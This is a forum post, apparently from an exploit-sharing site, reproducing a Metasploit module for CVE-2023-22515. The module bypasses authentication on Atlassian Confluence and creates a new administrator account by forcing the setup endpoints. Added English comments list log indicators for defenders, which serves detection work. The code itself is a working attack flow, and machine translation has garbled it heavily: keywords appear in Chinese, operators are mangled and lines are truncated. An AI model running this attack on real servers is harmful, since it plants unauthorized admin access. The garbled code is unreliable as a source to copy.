
Atlassian Confluence Data Center 和 Server - 身份验证绕过(Metasploit)

HackApt-37 Team已验证会员

##
# 此模块需要 Metasploit:https://metasploit.com/download
# 当前源码:https://github.com/rapid7/metasploit-framework
##
# NOTE(review): this listing has been through machine translation. Ruby keywords
# (class / include / def / end / return / super / unless), the `=>` hash rockets and the
# `::` namespace separators are garbled, and several lines are truncated, so the text
# below is not valid Ruby as shown. Use the upstream metasploit-framework repository
# as the authoritative source.
#
# Purpose (per the module's own metadata below): an auxiliary module for CVE-2023-22515,
# a broken-access-control flaw in Atlassian Confluence Data Center and Server that
# results in an authentication bypass.
#
# Defender summary, taken from the request paths and metadata visible in this listing:
#   * The module declares the side effects "IOC in logs" and "config changes", so a run
#     leaves traces in the web access log and changes application state.
#   * Requests worth searching for in Confluence / reverse-proxy access logs:
#       - /server-info.action carrying the
#         bootstrapstatusprovider.applicationconfig.setupcomplete=false query parameter
#       - POST to setup/setupadministrator.action
#       - POST to setup/finishsetup.action
#   * An administrator account nobody on the team created is the resulting change.
#   * Instances reporting a version inside the ranges tested in `check` should be
#     upgraded per the vendor advisory in the references. Restricting external access
#     to the /setup/ endpoints is a common interim measure; confirm against the advisory.
类MSF:AUXILARIY
预先预期MSF:EXPLOIT:REMOTE3:3360AUTOCHECK
包括MSF:EXPLOIT:REMOTE3:HTTPCLCCLIENT
# initialize: registers the module metadata (name, description, authors, references,
# disclosure date, default port 8090, stability / reliability / side-effect notes) and
# the user-settable options: targeturi, new_username, new_password, new_email.
def初始化(info={})
极好的(
update_info(
信息,
'name'='Atlassian Confluence数据中心和服务器身份验证旁路通过破损的访问控制',
'description'=%q {
该模块利用了Atlassian Confluence服务器中损坏的访问控制漏洞,导致身份验证旁路。
可以在目标Atlassian服务器上进行身份验证的情况下创建专门制作的请求。
},
'作者'=[
“未知”,# exploited in the wild
'emir polat'# Metasploit module
],
'参考'=[
['cve','2023-22515'],
['url','https://confluence.atlassian.com/se...erver-server-server-server-server-12956822276
['url','https://nvd.nist.gov/vuln/detail/cve-2023-22515'],],
['url','https://attackerkb.com/topics/q5f0itszw5/cve-2023-22515/rapid7-analysis']
],
'Dibleosuretate'='2023-10-04',
'DefaultOptions'={
'rport'=8090
},
'许可证'=msf_license,
'notes'={
'稳定性'=[crash_safe],
'可靠性'=[repoyable_session],
# Side effects declared by the module itself: it leaves indicators in logs and changes
# configuration. Both are useful starting points for detection and incident scoping.
'sidefects'=[ioc_in_logs,config_changes]
}


# NOTE(review): the new_username and new_password option lines below are cut off in
# this listing (the regex and the default value are missing).
register_options([
optString.new('targeturi',[true,'基本路径','/']),
optString.new('new_username',[true,'具有管理员特权创建新用户时要使用的用户名',faker3:3:internet.username],regex3: /^
optString.new('new_password',[true,'具有管理特权的新用户时要使用的密码'
optString.new('new_email',[true,'用管理特权创建新用户时要使用的电子邮件',faker3:internet.email])
)))
结尾
# check: version fingerprint only. Sends GET /login.action, reads the "poweredby" footer
# element of the returned page, extracts the Confluence version with a regex and compares
# it with three ranges: 8.0.0-8.3.2, 8.4.0-8.4.2, 8.5.0-8.5.1.
# Returns Unknown when there is no response, Safe on a non-200 reply or a non-matching
# footer, Appears when the version is inside a range, otherwise Safe.
# The result depends on the version banner alone; a customised or hidden footer yields
# Safe without saying anything about the actual patch level.
DEF检查
res=send_request_cgi(
'方法'='get',
'uri'=normalize_uri(target_uri.path,'/login.action')

返回exploit3:checkcode3:unknown除非res
返回exploit3:3360checkcode3:safe,除非res.code==200
# NOTE(review): `.first.text` is called on the XPath result with no visible guard for a
# page that lacks the footer element - confirm against the upstream source.
poweredby=res.get_xml_document.xpath('//ul [@id='poweredby']/li [@class='print-inly']/text()')。first.text
返回exploit3:checkcode3:safe除非poweredby=〜 /confluence(\ d+(\ d+(\。\ d+)) /
contruence_version=rex:version.new(regexp.last_match(1))
vprint_status('检测到的汇集版本:#{confluence_version}')
如果contruence_version.between?(rex:version.new('8.0.0'),rex33:3:version.new('8.3.2')||
contruence_version.between?(rex:version.new('8.4.0'),rex33:3:version.new('8.4.2')||
contruence_version.between?(rex:version.new('8.5.0'),rex3:3:version.new('8.5.1'))
返回exploit3:checkcode3:appears('contruence 3:#{contruence_version}'的'可利用版本
结尾
exploit3:3360checkcode:3:SAFE('Confluence版本3:#{contruence_version}')
结尾
# run: issues three requests in order - GET /server-info.action with the setup-complete
# override parameter, the POST made by create_admin_user, then POST
# setup/finishsetup.action - and records the resulting credential in the Metasploit
# database via create_credential.
# Each of these requests is visible in the web access log of the target.
def运行
res=send_request_cgi(
'方法'='get',
'uri'=normalize_uri(target_uri.path,'/server-info.action'),
'vars_get'={
'bootstrapstatusprovider.applicationconfig.setupcomplete'='false'
}

# NOTE(review): as shown, `res` is dereferenced with no nil check, so a timeout would
# raise instead of reaching fail_with - verify against upstream.
返回fail_with(MSF:EXPLOIT33:FAILURE:UNEXPECTEDREPTER,“版本ablesable and ablesause and aborable and setup noted'')除非res.code.code==302 || res.code==200
print_good('找到的服务器info.action!试图忽略设置。')
create_user=create_admin_user
res=send_request_cgi(
'方法'='post',
'uri'=normalize_uri(target_uri.path,'setup/finishsetup.action'),
'标题'={
'x-atlassian-token'='无检查
}

# NOTE(review): the next two lines are truncated / merged in this listing; the condition
# guarding the NoAccess failure is not visible here.
返回fail_with(MSF:EXPLOIT3:FAILURE:33:NOACCESS,“无法创建管理用户。
print_warning(创建了admin用户,但无法完成设置。”)除非res.code==200
create_credential({
workspace_id: myworkspace_id,
Origin_Type:服务,
module_fullname: fullname,
username: datastore ['new_username'],
private_type:password,
private_data:数据存储['new_password'],
service_name:'Atlassian Confluence',
地址:数据存储['rhost'],
port:数据存储['rport'],
协议:'TCP',
状态: Metasploit:Model3:Login3:3:Status:untried
}))
print_good('admin用户成功创建了。
# NOTE(review): the printed URL hard-codes the http scheme and reads 'rhosts', while the
# credential record above reads 'rhost' - an inconsistency in the listing as shown.
print_good('现在您可以从: http://#{datastore ['rhosts']} :#{datastore ['rport']}#dataTastore ['targeturi'] login.action')
结尾
# create_admin_user: POSTs the new_username / new_email / new_password option values to
# setup/setupadministrator.action and returns whether the response code was 302.
# NOTE(review): `res.code` is read with no visible nil guard - verify against upstream.
def create_admin_user
res=send_request_cgi(
'方法'='post',
'uri'=normalize_uri(target_uri.path,'setup/setupadministrator.action'),
'标题'={
'x-atlassian-token'='无检查
},
'vars_post'={
'用户名'=datastore ['new_username'],
'fullname'=“新管理员”,
'email'=datastore ['new_email'],
'密码'=datastore ['new_password'],
'确认'=datastore ['new_password'],
'setup-next-button'='next'
}

res.code==302
结尾
结尾
 